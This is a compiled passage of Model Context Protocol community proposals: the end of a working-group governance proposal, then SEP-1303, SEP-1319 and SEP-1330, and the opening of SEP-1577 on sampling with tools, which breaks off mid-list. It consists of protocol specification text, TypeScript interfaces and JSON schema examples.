The design above comes from experience in facilitating the creation of + observing the behavior of informal “Community Working Groups” in the CWG Discord, and leading one of / participating in / observing the “Steering Committee Working Groups”. While the Steering WG’s were usually informally created by Lead Maintainers, the CWG Discord had a lightweight WG-creation process that involved similar steps to the proposal above (community members would propose WG’s in #working-group-ideation, and moderators would create channels from that collaboration).
As precedent, the WG and IG concepts here are similar to W3C’s notion of [Working Groups](https://www.w3.org/groups/wg/) and [Interest Groups](https://www.w3.org/groups/ig/).
### Considerations
In proposing the WG/IG design, we took the following into consideration:
#### Clear on-ramp for community involvement
A very common question for folks looking to invest in the MCP ecosystem is, "how do I get involved?"
These IG and WG abstractions help provide an elegant on-ramp:
1. Join the Discord, follow the conversation in IGs relevant to you. Attend live calls. Participate.
2. Offer to facilitate calls. Contribute your use cases in SEP proposals and other work.
3. When you're comfortable contributing to deliverables, jump in to contribute to WG work.
4. Do this for a period of time, get noticed by WG maintainers to get nominated as a new maintainer.
#### Minimal changes to existing governance structure
We did not want this change to introduce new elections, appointments, or other notions of leadership. We leverage community moderators to thumbs-up creation of new groups, allow core maintainers to veto, maintainership status stays unchanged, and the notion of "facilitator" is new but self-nominated, so does not introduce any new governance processes.
#### Alignment with current status quo
There is a clear "migration" path for the existing "CWG" working groups and Steering working groups - just a matter of sorting out what is "working" vs. "interest", but functionally this proposal stays out of the way of changing anything that has been working within each group's existing structure.
#### Nature of requests for gathering spaces
It has been clear from the requests to CWG that some groups form with a motivation to collaborate on some deliverable (e.g. `search-tools`), and others form due to common interests and a want for sub-community but not yet specific deliverables (e.g. `enterprise`). Hence, we separate the motivations into Working Groups vs. Interest Groups.
#### Potential for overlap in scope
In the requests for new group spaces, it is sometimes non-obvious why a new one needs to exist. For example, the stated motivation for `enterprise` at times sounded like it may just be another flavor of `hosting`. We ultimately settled on a distinction that made it clear one was not a direct subset of the other, but the concern of making clear boundaries between groups (and letting community moderators / maintainers centralize the decision-making around "what are the right layers of abstraction") is what led to the questions in the creation templates around e.g. "flag potential overlap with other IG’s".
#### Path to retiring stale groups
Many working groups in the old CWG and Steering models have gone stale since creation. They serve no real purpose and should be retired. For this, we introduce the formal concept of facilitators and optional maintainers in groups; and the community moderator right to retire them. By having at least informal leadership in place per group, a moderator can easily make the decision to retire a group if everyone is in agreement to proceed.
### Alternatives Considered
#### Hierarchy between IGs and WGs
We considered *requiring* that WGs be owned or spawned by a "sponsor" IG, for the purpose of more clearly exhibiting a progression of ideas to the community; but decided against this requiring to avoid adding a new layer of governance and alignment with how the less formal groups works today.
#### A single WG concept (instead of both WG and IG)
There has been regular tension in both CWG and the Steering group around the question of "is XYZ really a working group? how will maintainership work?" By making IG's explicitly discussion-oriented and maintainership involvement optional, we create a space to drive those discussions without requiring some formal expectation of deliverables like we might in a well-defined WG.
#### Free-for-all WG/IG creation process
While very community-driven, the concern of group overlap would quickly fragment the conversations and collaboration to an untenable level; we need a centralized point of discernment here.
## Backward Compatibility
*All SEPs that introduce backward incompatibilities must include a section describing these incompatibilities and their severity. The SEP must explain how the author proposes to deal with these incompatibilities.*
There is no major change suggested in the day to day of existing groups - the expectations laid out of IGs and WGs are easily met by existing active groups as long as they keep doing as they are doing.
A migration path for all groups is laid out below.
## Reference Implementation
*The reference implementation must be completed before any SEP is given status “Final”, but it need not be completed before the SEP is accepted. While there is merit to the approach of reaching consensus on the specification and rationale before writing code, the principle of “rough consensus and running code” is still useful when it comes to resolving many discussions of protocol details.*
The below is the suggested migration path for each group. "Migration" just involves acknowledgement of this SEP and the expectations of each group, plus methodology for possible eventual retirement (or immediate retirement, in some cases).
After this SEP is approved, we can ping each of the groups to confirm they are on board with the migration plan.
### Steering Working Groups
* All official SDK groups --> Working Groups
* Registry --> Working Group
* Documentation --> Working Group
* Inspector --> Working Group
* Auth --> Interest Group + some WGs: client-registration, improve-devx, profiles, tool-scopes
* Agents --> Working Group \[Long Running / Async Tool Calls; unless we want an Agents IG on top of that?]
* Connection Lifetime --> Retire
* Streaming --> Retire
* Spec Compliance --> Retire (good idea but stale; would be good for someone to spearhead a new Working Group)
* Security --> Interest Group (perhaps with Security Best Practices WG?)
* Transports --> Interest Group
* Server Identity --> Working Group
* Governance --> Working Group (or Retire if no more work here?)
### Community Working Groups
* agent-comms --> Retire
* enterprise --> Interest Group (request a proposal to start)
* hosting --> Interest Group (request a proposal to start)
* load-balancing --> Retire
* model-awareness --> Working Group (request a proposal to start)
* search-tools (tool-filtering) --> Working Group
* server-identity --> merge with Steering equivalent
* security --> merge with Steering equivalent
* server-identity --> merge with Steering equivalent
* tool-interfaces --> Retire
* ui --> Interest Group
* schema-validation --> Retire (same as Steering equivalent)
# SEP-1303: Input Validation Errors as Tool Execution Errors
Source: https://modelcontextprotocol.io/community/seps/1303-input-validation-errors-as-tool-execution-errors
Input Validation Errors as Tool Execution Errors
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1303 |
| **Title** | Input Validation Errors as Tool Execution Errors |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-05 |
| **Author(s)** | [@fredericbarthelet](https://github.com/fredericbarthelet) |
| **Sponsor** | None |
| **PR** | [#1303](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1303) |
***
## Abstract
This SEP proposes treating tools input validation errors as Tool Execution Errors rather than Protocol Errors. This change would enable language models to receive validation error feedback in their context window, allowing them to self-correct and successfully complete tasks without human intervention, significantly improving task completion rate.
## Motivation
Language models can learn from tool input validation error messages and retry a tools/call with corrected parameters accordingly, but only if they receive the error feedback in their context window. Protocol Errors are catch at the application level by the MCP Client. Only Tool Execution Errors are forwarded back to the model as JSON-RPC responses. With the current specifications, models cannot see these error messages and thus cannot self-correct, leading to repeated failures and poor user experiences.
### Problem Statement
Consider a flight booking tool that validates departure dates using the following `zod` validation schema:
```typescript theme={null}
departureDate: z.string()
.regex(/^\d{2}\/\d{2}\/\d{4}$/, "date must be in dd/mm/yyyy format")
.superRefine((dateStr, ctx) => {
const date = parseDateFr(dateStr);
if (date.getTime() < Date.now()) {
ctx.addIssue({
code: z.ZodIssueCode.custom,
message:
"Dates must be in the future. Current date is " +
formatDateFr(new Date()),
});
}
return true;
})
.describe("Departure date in dd/mm/yyyy format");
```
Tool expected input JSON schema can only describe the regex statement. The actual programmatic check that the date is in the past cannot be expressed here as JSON schema.
Even when a model provides a syntactically correct date that passes JSON schema validation, there is no guarantee it will be in the future. When a validation error is raised and returned as a Protocol Error:
1. The model doesn't receive the error message explaining why the date was rejected
2. The model repeats the same mistake multiple times (e.g., Cursor typically consistently sends dates in 2024 when the user only specify day and month or relative date and repeats the same tools/call request 3 times without getting any information as to why the tools call fails)
3. The task fails despite the model being capable of correcting itself if given proper feedback
4. Users experience frustration and must manually intervene
### Benefits of This Proposal
1. **Higher Task Completion Rates**: Models can self-correct validation errors without human intervention
2. **Better User Experience**: Reduced failures and faster task completion
3. **Leverages Model Capabilities**: Modern LLMs excel at understanding and responding to error messages
4. **Reduced API Calls**: Fewer retry attempts as models correct themselves on the first error
## Specification
### Current Behavior
The [tool errors specification](https://modelcontextprotocol.io/specification/2025-06-18/server/tools#error-handling) currently provides ambiguous guidance:
* "Invalid arguments" should be treated as Protocol Error
* "Invalid input data" should be treated as Tool Execution Error
This ambiguity leads to inconsistent implementations where valuable error feedback is lost.
### Proposed Change
Clarify the specification with the following changes:
1. Removes the "invalid argument" category from **Protocol Errors**.
2. **Tool Execution Errors** should be used for all tool argument validation failures (merging `invalid argument` and `invalid input data` under a new `input validation errors` category)
### Specification Text Changes
Update the error handling section to include:
```
## Error Handling
Tools use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for issues like:
- Unknown tools
- Server errors
2. **Tool Execution Errors**: Reported in tool results with `isError: true`:
- API failures
- Input validation errors
- Business logic errors
```
## Implementation
### Before (Protocol Error)
```typescript theme={null}
// Model submits past date
request: {
...
method: "tools/call",
params: {
name: "book_flight",
arguments: {
departureDate: "12/12/2024" // Past date
}
}
}
// Server returns Protocol Error
response: {
...
error: {
code: -32602,
message: "Invalid params"
}
}
// Model retries blindly with another past date
// This cycle repeats until failure
```
### After (Tool Execution Error)
```typescript theme={null}
// Model submits past date
request: {
...
method: "tools/call",
params: {
name: "book_flight",
arguments: {
departureDate: "12/12/2024" // Past date
}
}
}
// Server returns Tool Execution Error (visible to model)
response: {
...
"result": {
"content": [
{
"type": "text",
"text": "Dates must be in the future. Current date is 08/08/2025"
}
],
"isError": true
}
}
// Model understands the error and corrects itself
request: {
method: "tools/call",
params: {
name: "book_flight",
arguments: {
departureDate: "12/12/2025" // Future date
}
}
}
```
## Backwards Compatibility
This change is backwards compatible as it:
* Does not alter the protocol structure
* Only clarifies existing ambiguous behavior
* Maintains all existing error types and formats
* Improves behavior without breaking existing implementations
Servers implementing the clarified behavior will provide better model self-recovery while continuing to work with all existing clients.
## References
* [MCP Tools Error Handling Specification](https://modelcontextprotocol.io/specification/2025-06-18/server/tools#error-handling)
* [Better MCP tools/call Error Responses: Help Your AI Recover Gracefully](https://dev.to/alpic/better-mcp-toolscall-error-responses-help-your-ai-recover-gracefully-15c7)
* Related Issue: [https://github.com/modelcontextprotocol/typescript-sdk/pull/824](https://github.com/modelcontextprotocol/typescript-sdk/pull/824)
# SEP-1319: Decouple Request Payload from RPC Methods Definition
Source: https://modelcontextprotocol.io/community/seps/1319-decouple-request-payload-from-rpc-methods-definiti
Decouple Request Payload from RPC Methods Definition
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1319 |
| **Title** | Decouple Request Payload from RPC Methods Definition |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-08 |
| **Author(s)** | [@kurtisvg](https://github.com/kurtisvg) |
| **Sponsor** | None |
| **PR** | [#1319](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1319) |
***
## Abstract
This SEP proposes a structural refactoring of the Model Context Protocol (MCP) specification. The core change is to define payload of requests (e.g., CallToolRequest) as independent definitions and have the RPC method definitions refer to these models. This decouples the definition of the data payload from the definition of the remote procedure that transports it, leading to a clearer, more modular, and more maintainable specification.
## Motivation
The current MCP specification tightly couples the data payload of a request with the JSON-RPC method that transports it. This design presents several challenges:
* **Reduced Clarity:** It forces developers to mentally parse the JSON-RPC transport structure just to understand the core data being exchanged. This increases cognitive load and makes the specification difficult to read and implement correctly.
* **Hindered Maintainability:** Defining data structures inline prevents their reuse across different methods, leading to redundancy and making future updates to the protocol more complex and error-prone.
* **Tightly Coupled to JSON-RPC:** Most critically, this tight coupling to JSON-RPC is the primary blocker for defining bindings for other transport protocols. To support transports like **gRPC** (which is currently a [popular ask from the community](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/966)), a transport-agnostic definition of its request and response messages. The current structure makes this practically impossible.
By refactoring the specification to separate the data model (the "what") from the RPC method (the "how"), this proposal will create a clearer, more modular specification. This change will immediately improve the developer experience and, most importantly, pave the way for the future evolution of MCP across multiple transports.
## Specification
The proposal introduces the following principle: All data structures used as parameters (params) or results (result) for RPC methods should be defined as standalone, named schemas. The RPC method definitions will then use references to these schemas.
### Current Approach (Inline Definition):
The RPC method definition contains the full structure of its parameters and results.
```ts theme={null}
export interface CallToolRequest extends Request {
method: "tools/call";
params: {
name: string;
arguments?: { [key: string]: unknown };
};
}
```
### Proposed Approach (Decoupled Definition):
First, the data models for the request and response are defined as top-level schemas.
```ts theme={null}
/**
* Parameters for a `tools/call` request.
*
* @category tools/call
*/
export interface CallToolRequestParams extends RequestParams {
name: string;
arguments?: { [key: string]: unknown };
}
```
Then, the RPC method definition becomes much simpler, merely referring to these models.
```ts theme={null}
export interface CallToolRequest extends Request {
method: "tools/call";
params: CallToolRequestParams;
}
```
## Rationale
The proposed solution—separating payload definitions from the RPC method—was chosen as the most direct and non-disruptive path to achieving the goals outlined in the motivation.
This approach establishes a clear architectural boundary between two distinct concerns:
1. **The Data Layer:** The transport-agnostic payload definition (e.g., `CallToolRequestParams`), which represents the core information being exchanged.
2. **The Transport Layer:** The protocol-specific wrapper (e.g., the JSON-RPC `CallToolRequest` object), which describes how the data is sent.
This architectural separation is superior to maintaining separate, parallel specifications for each transport (e.g., one for JSON-RPC, another for gRPC), which would introduce significant maintenance overhead and risk inconsistencies.
Crucially, this design refactors the specification document itself but intentionally **leaves the on-the-wire format unchanged**. This makes the proposal fully backward-compatible, requiring no changes from existing, compliant clients and servers. In short, this change is a strategic, foundational improvement that enables future growth without penalizing the current ecosystem.
## Backward Compatibility
This proposal is a **non-breaking change** for existing implementations. It is a refactoring of the *specification document itself* and does not alter the on-the-wire JSON format of the protocol messages. A client or server that is compliant with the old specification structure will remain compliant with the new one, as the resulting JSON payloads are identical.
The primary impact is on developers who read the specification and on tools that parse the specification to generate code or documentation.
# SEP-1330: Elicitation Enum Schema Improvements and Standards Compliance
Source: https://modelcontextprotocol.io/community/seps/1330-elicitation-enum-schema-improvements-and-standards
Elicitation Enum Schema Improvements and Standards Compliance
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1330 |
| **Title** | Elicitation Enum Schema Improvements and Standards Compliance |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-11 |
| **Author(s)** | chughtapan |
| **Sponsor** | None |
| **PR** | [#1330](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1330) |
***
## Abstract
This SEP proposes improvements to enum schema definitions in MCP, deprecating the non-standard `enumNames` property in favor of JSON Schema-compliant patterns, and introducing additional support for multi-select enum schemas in addition to single choice schemas. The new schemas have been validated against the JSON specification.
**Schema Changes:** [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148)
Typescript SDK Changes: [https://github.com/modelcontextprotocol/typescript-sdk/pull/1077](https://github.com/modelcontextprotocol/typescript-sdk/pull/1077)
Python SDK Changes: [https://github.com/modelcontextprotocol/python-sdk/pull/1246](https://github.com/modelcontextprotocol/python-sdk/pull/1246)
**Client Implementation:** [https://github.com/evalstate/fast-agent/pull/324/files](https://github.com/evalstate/fast-agent/pull/324/files)
**Working Demo:** [https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta](https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta)
## Motivation
The existing schema for enums uses a non-standard approach to adding titles to enumerated values. It also limits use of enums in Elicitation (and any other schema object that should adopt `EnumSchema` in the future) to a single selection model. It is a common pattern to ask the user to select multiple entries. In the UI, this amounts to the difference between using checkboxes or radio buttons.
For these reasons, we propose the following non-breaking minor improvements to the `EnumSchema` for improving user and developer experience.
* Keep the existing `EnumSchema` as "Legacy"
* It uses a non-standard approach for adding titles to enumerated values
* Mark it as Legacy but still support it for now.
* As per @dsp-ant When we have a proper deprecation strategy, we'll mark it deprecated
* Introduce the distinction between Untitled and Titled enums.
* If the enumerated values are sufficient, no separate title need be specified for each value.
* If the enumerated values are not optimal for display, a title may be specified for each value.
* Introduce the distinction between Single and Multi-select enums.
* If only one value can be selected, a Single select schema can be used
* If more than one value can be selected, a Multi-select schema can be used
* In `ElicitResponse`, add array as an `additionalProperty` type
* Allows multiple selection of enumerated values to be returned to the server
## Specification
### 1. Mark Current `EnumSchema` with Non-Standard `enumNames` Property as "Legacy"
The current MCP specification uses a non-standard `enumNames` property for providing display names for enum values. We propose to mark `enumNames` property as legacy, suggest using `TitledSingleSelectEnum`, a standards compliant enum type we define below.
```typescript theme={null}
// Continue to support the current EnumSchema as Legacy
/**
* Legacy: Use TitledSingleSelectEnumSchema instead.
* This interface will be removed in a future version.
*/
export interface LegacyEnumSchema {
type: "string";
title?: string;
description?: string;
enum: string[];
enumNames?: string[]; // Titles for enum values (non-standard, legacy)
}
```
### 2. Define Single Selection Enums (with Titled and Untitled varieties)
Enums may or may not need titles. The enumerated values may be human readable and fine for display. In which case an untitled implementation using the JSON Schema keyword `enum` is simpler. Adding titles requires the `enum` array to be replaced with an array of objects using `const` and `title`.
```typescript theme={null}
// Single select enum without titles
export type UntitledSingleSelectEnumSchema = {
type: "string";
title?: string;
description?: string;
enum: string[]; // Plain enum without titles
};
// Single select enum with titles
export type TitledSingleSelectEnumSchema = {
type: "string";
title?: string;
description?: string;
oneOf: Array<{
const: string; // Enum value
title: string; // Display name for enum value
}>;
};
// Combined single selection enumeration
export type SingleSelectEnumSchema =
| UntitledSingleSelectEnumSchema
| TitledSingleSelectEnumSchema;
```
### 3. Introduce Multiple Selection Enums (with Titled and Untitled varieties)
While elicitation does not support arbitrary JSON types like arrays and objects so clients can display the selection choice easily, multiple selection enumerations can be easily implemented.
```typescript theme={null}
// Multiple select enums without titles
export type UntitledMultiSelectEnumSchema = {
type: "array";
title?: string;
description?: string;
minItems?: number; // Minimum number of items to choose
maxItems?: number; // Maximum number of items to choose
items: {
type: "string";
enum: string[]; // Plain enum without titles
};
};
// Multiple select enums with titles
export type TitledMultiSelectEnumSchema = {
type: "array";
title?: string;
description?: string;
minItems?: number; // Minimum number of items to choose
maxItems?: number; // Maximum number of items to choose
items: {
oneOf: Array<{
const: string; // Enum value
title: string; // Display name for enum value
}>;
};
};
// Combined Multiple select enumeration
export type MultiSelectEnumSchema =
| UntitledMultiSelectEnumSchema
| TitledMultiSelectEnumSchema;
```
### 4. Combine All Varieties as `EnumSchema`
The final `EnumSchema` rolls up the legacy, multi-select, and single-select schemas as one, defined as:
```typescript theme={null}
// Combined legacy, multiple, and single select enumeration
export type EnumSchema =
| SingleSelectEnumSchema
| MultiSelectEnumSchema
| LegacyEnumSchema;
```
### 5. Extend ElicitResult
The current elicitation result schema only allows returning primitive types. We extend this to include string arrays for MultiSelectEnums:
```typescript theme={null}
export interface ElicitResult extends Result {
action: "accept" | "decline" | "cancel";
content?: { [key: string]: string | number | boolean | string[] }; // string[] is new
}
```
## Instance Schema Examples
### Single-Select Without Titles (No change)
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["Red", "Green", "Blue"],
"default": "Green"
}
```
### Legacy Single Select With Titles
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["#FF0000", "#00FF00", "#0000FF"],
“enumNames”: ["Red", "Green", "Blue"],
"default": "Green"
}
```
### Single-Select with Titles
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"oneOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
],
"default": "#00FF00"
}
```
### Multi-Select Without Titles
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 3,
"items": {
"type": "string",
"enum": ["Red", "Green", "Blue"]
},
"default": ["Green"]
}
```
### Multi-Select with Titles
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 3,
"items": {
"anyOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
]
},
"default": ["Green"]
}
```
## Rationale
1. **Standards Compliance**: Aligns with official JSON Schema specification. Standard patterns work with existing JSON Schema validators
2. **Flexibility**: Supports both plain enums and enums with display names for single and multiple choice enums.
3. **Client Implementation:** shows that the additional overhead of implementing a group of checkboxes v/s a single checkbox is minimal: [https://github.com/evalstate/fast-agent/pull/324/files](https://github.com/evalstate/fast-agent/pull/324/files)
## Backwards Compatibility
The `LegacyEnumSchema` type maintains backwards compatible during the migration period. Existing implementations using `enumNames` will continue to work until a protocol-wide deprecation strategy is implemented, and this schema is removed.
## Reference Implementation
**Schema Changes:** [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1148)
Typescript SDK Changes: [https://github.com/modelcontextprotocol/typescript-sdk/pull/1077](https://github.com/modelcontextprotocol/typescript-sdk/pull/1077)
Python SDK Changes: [https://github.com/modelcontextprotocol/python-sdk/pull/1246](https://github.com/modelcontextprotocol/python-sdk/pull/1246)
**Client Implementation:** [https://github.com/evalstate/fast-agent/pull/324/files](https://github.com/evalstate/fast-agent/pull/324/files)
**Working Demo:** [https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta](https://asciinema.org/a/anBvJdqEmTjw0JkKYOooQa5Ta)
## Security Considerations
No security implications identified. This change is purely about schema structure and standards compliance.
## Appendix
### Validations
Using stored validations in the JSON Schema Validator at [https://www.jsonschemavalidator.net/](https://www.jsonschemavalidator.net/) we validate:
* All of the example instance schemas from this document against the proposed JSON meta-schema `EnumSchema` in the next section.
* Valid and invalid values against the example instance schemas from this document.
#### Legacy Single Selection
* `EnumSchema` validating a [legacy single select instance schema with titles](https://www.jsonschemavalidator.net/s/lsK7Bn0C)
* The legacy titled single select instance schema validating [a correct single selection](https://www.jsonschemavalidator.net/s/GSk7rnRe)
* The legacy titled single select instance schema validating [an incorrect single selection](https://www.jsonschemavalidator.net/s/3kYvxsVP)
#### Single Selection
* `EnumSchema` validating a [single select instance schema without titles](https://www.jsonschemavalidator.net/s/MBlHW5IQ)
* `EnumSchema` validating a [single select instance schema with titles](https://www.jsonschemavalidator.net/s/s38xt4JV)
* The untitled single select instance schema validating [a correct single selection](https://www.jsonschemavalidator.net/s/M0hkYoeG)
* The untitled single select instance schema invalidating [an incorrect single selection](https://www.jsonschemavalidator.net/s/3Try4BCt)
* The titled single select instance schema validating [a correct single selection](https://www.jsonschemavalidator.net/s/4oDbv9yt)
* The titled single select instance schema invalidating [an incorrect single selection](https://www.jsonschemavalidator.net/s/A2KlNzLH)
#### Multiple Selection
* `EnumSchema` validating the [multi-select instance schema without titles](https://www.jsonschemavalidator.net/s/4uc3Ndsq)
* `EnumSchema` validating the [multi-select instance schema with titles](https://www.jsonschemavalidator.net/s/TmkIqqXI)
* The untitled multi-select instance schema validating [a correct multiple selection](https://www.jsonschemavalidator.net/s/IE8Bkvtg)
The untitled multi-select instance schema validating invalidating[ an incorrect multiple selection](https://www.jsonschemavalidator.net/s/8tlqjUgW)
The titled multi-select instance schema validating [a correct multiple selection](https://www.jsonschemavalidator.net/s/Nb1Rw1qa)
The titled multi-select instance schema validating invalidating [an incorrect multiple selection](https://www.jsonschemavalidator.net/s/MRfyqrVC)
### JSON meta-schema
This is our proposal for the replacement of the current `EnumSchema` in the specification’s `schema.json`.
```json theme={null}
{
"$schema": "https://json-schema.org/draft-07/schema",
"definitions": {
// New Definitions Follow
"UntitledSingleSelectEnumSchema": {
"type": "object",
"properties": {
"type": { "const": "string" },
"title": { "type": "string" },
"description": { "type": "string" },
"enum": {
"type": "array",
"items": { "type": "string" },
"minItems": 1
}
},
"required": ["type", "enum"],
"additionalProperties": false
},
"UntitledMultiSelectEnumSchema": {
"type": "object",
"properties": {
"type": { "const": "array" },
"title": { "type": "string" },
"description": { "type": "string" },
"minItems": {
"type": "number",
"minimum": 0
},
"maxItems": {
"type": "number",
"minimum": 0
},
"items": {
"type": "object",
"properties": {
"type": { "const": "string" },
"enum": {
"type": "array",
"items": { "type": "string" },
"minItems": 1
}
},
"required": ["type", "enum"],
"additionalProperties": false
}
},
"required": ["type", "items"],
"additionalProperties": false
},
"TitledSingleSelectEnumSchema": {
"type": "object",
"required": ["type", "anyOf"],
"properties": {
"type": { "const": "string" },
"title": { "type": "string" },
"description": { "type": "string" },
"anyOf": {
"type": "array",
"items": {
"type": "object",
"required": ["const", "title"],
"properties": {
"const": { "type": "string" },
"title": { "type": "string" }
},
"additionalProperties": false
}
}
},
"additionalProperties": false
},
"TitledMultiSelectEnumSchema": {
"type": "object",
"required": ["type", "anyOf"],
"properties": {
"type": { "const": "array" },
"title": { "type": "string" },
"description": { "type": "string" },
"anyOf": {
"type": "array",
"items": {
"type": "object",
"required": ["const", "title"],
"properties": {
"const": { "type": "string" },
"title": { "type": "string" }
},
"additionalProperties": false
}
}
},
"additionalProperties": false
},
"LegacyEnumSchema": {
"properties": {
"type": {
"type": "string",
"const": "string"
},
"title": { "type": "string" },
"description": { "type": "string" },
"enum": {
"type": "array",
"items": { "type": "string" }
},
"enumNames": {
"type": "array",
"items": { "type": "string" }
}
},
"required": ["enum", "type"],
"type": "object"
},
"EnumSchema": {
"oneOf": [
{ "$ref": "#/definitions/UntitledSingleSelectEnumSchema" },
{ "$ref": "#/definitions/UntitledMultiSelectEnumSchema" },
{ "$ref": "#/definitions/TitledSingleSelectEnumSchema" },
{ "$ref": "#/definitions/TitledMultiSelectEnumSchema" },
{ "$ref": "#/definitions/LegacyEnumSchema" }
]
}
}
}
```
# SEP-1577: Sampling With Tools
Source: https://modelcontextprotocol.io/community/seps/1577--sampling-with-tools
Sampling With Tools
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1577 |
| **Title** | Sampling With Tools |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-09-30 |
| **Author(s)** | Olivier Chafik ([@ochafik](https://github.com/ochafik)) |
| **Sponsor** | None |
| **PR** | [#1577](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1577) |
***
## Abstract
This SEP introduces `tools` & `toolChoice` params to `sampling/createMessage` and soft-deprecates `includeContext` (fences `thisServer` & `allServers` under a capability). This allows MCP servers to run their own agentic loops using the client's tokens (still under the user supervision), and reduces the complexity of client implementations (context support becoming explicitly optional).
## Motivation
* [Sampling](https://modelcontextprotocol.io/specification/2025-06-18/client/sampling) doesn't support tool calling, although it's a cornerstone of modern agentic behaviour. Without explicit support for it, MCP servers that use Sampling can either try and emulate tool calling w/ complex prompting / custom parsing of the outputs, or are limited to simpler, non-agentic requests. Adding support for tool calling could unlock many novel use cases in the MCP ecosystem.
* Context inclusion is ambiguously defined (see [this doc](https://docs.google.com/document/d/1KUsloHpsjR4fdXdJuofb9jUuK0XWi88clbRm9sWE510/edit?tab=t.0#heading=h.edw7oyac2e87)): it makes it particularly tricky to fully implement sampling, which along with other precautions needed for sampling (unaffected by this SEP) may have contributed to [low adoption of the feature in clients](https://modelcontextprotocol.io/clients#feature-support-matrix) (feature was introduced in the MCP Nov 2024 spec).
Please note some related work:
* [MCP Sampling](https://docs.google.com/document/d/1KUsloHpsjR4fdXdJuofb9jUuK0XWi88clbRm9sWE510/edit?tab=t.0#heading=h.5diekssgi3pq) (@jerome3o-anthropic): extremely similar proposal:
* Add same tools semantics,
* Deprecate `includeContext` (doc explains why its semantics are ambiguous)
* (goes further to suggest explicit context sharing, which is out of scope from this proposal)
* [Allow Prompt/Sampling Messages to contain multiple content blocks. #198](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/198)
* In this PR we've made `{CreateMessageResult,SamplingMessage}.content` to accept a single content or an array of contents. The `result.content` change is backwards incompatible but is required to support parallel tool calls. The `SamplingMessage.content` change then makes it much more natural to write a tool loop (see example in reference implementation: [toolLoopSampling.ts](https://github.com/modelcontextprotocol/typescript-sdk/blob/ochafik/sep1577/src/examples/server/toolLoopSampling.ts))
In the "Possible Follow ups" Section below, we give examples of features that were kept out of scope from this SEP but which we took care to make this SEP reasonably compatible with.
## Specification
### Overview
* Add traditional tool call support in [CreateMessageRequest](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) w/ `tools` (w/ JSON schemas) & `toolChoice` params, requiring a server-side tool loop
* Sampling may now yield ToolCallBlock responses
* Server needs to call tools by itself
* Server calls sampling again with ToolResultParamBlock to inject tool results
* `toolChoice.mode` can be `“auto" | "required" | "none"` to allow common structured outputs use case (see below for possible follow up improvements)
* Fenced by new capability (`sampling { tools {} }`)
* Fix/update underspecified strings in [CreateMessageResult](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessageresult):
* `stopReason: “endTurn" | "stopSequence" | “toolUse" | “maxToken" | string` (explicit enums + open string for compat)
* `role: “assistant”`
* Soft-deprecate [CreateMessageRequest.params.includeContext](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) != ‘none’ (now fenced by capability)
* Incentivize context-free sampling implementation
### Protocol changes
* `sampling/createMessage`
* ~~MUST throw an error when `includeContext is “thisServer” | “allServers”` but `clientCapabilities.sampling.context` is missing~~
* MUST throw an error when `tool` or `toolChoice` are defined but `clientCapabilities.sampling.tools` is missing
* Servers SHOULD avoid `[includeContext](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest)` != ‘none’`as values`“thisServer”`and`“allServers”\` may be removed in future spec releases.
* `CreateMessageRequest.messages` MUST balance any “assistant” message w/ a `ToolUseContent` (and `id: $id1`) w/ a “user” message w/ a ToolResultContent (and `tool_result_id: $id1`)
* Note: this is a requirement for Claude API implementation (parallel tool call must all be responded to in one go)
* SamplingMessage with tool result content blocks MUST NOT contain other content types.
### Schema changes
* [ClientCapabilities](https://modelcontextprotocol.io/specification/2025-06-18/schema#clientcapabilities)
```typescript theme={null}
interface ClientCapabilities {
...
sampling?: {
context?: object; // NEW: Allows CreateMessageRequest.params.includeContext != "none"
tools?: object; // NEW: Allows CreateMessageRequest.params.{tools,toolChoice}
};
}
```
* [CreateMessageRequest](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) (use existing [Tool](https://modelcontextprotocol.io/specification/2025-06-18/schema#tool))
```typescript theme={null}
interface CreateMessageRequest {
method: “sampling/createMessage”;
params: {
...
messages: SamplingMessage[]; // Note: type updated, see below
tools?: Tool[] // NEW (existing type)
toolChoice?: ToolChoice // NEW
};
}
interface ToolChoice { // NEW
mode?: “auto” | "required" | "none";
// disable_parallel_tool_use?: boolean; // Update (Nov 10): removed, see below
}
```
* Notes:
* OpenAI vs. Anthropic API idioms to avoid parallel tool calls:
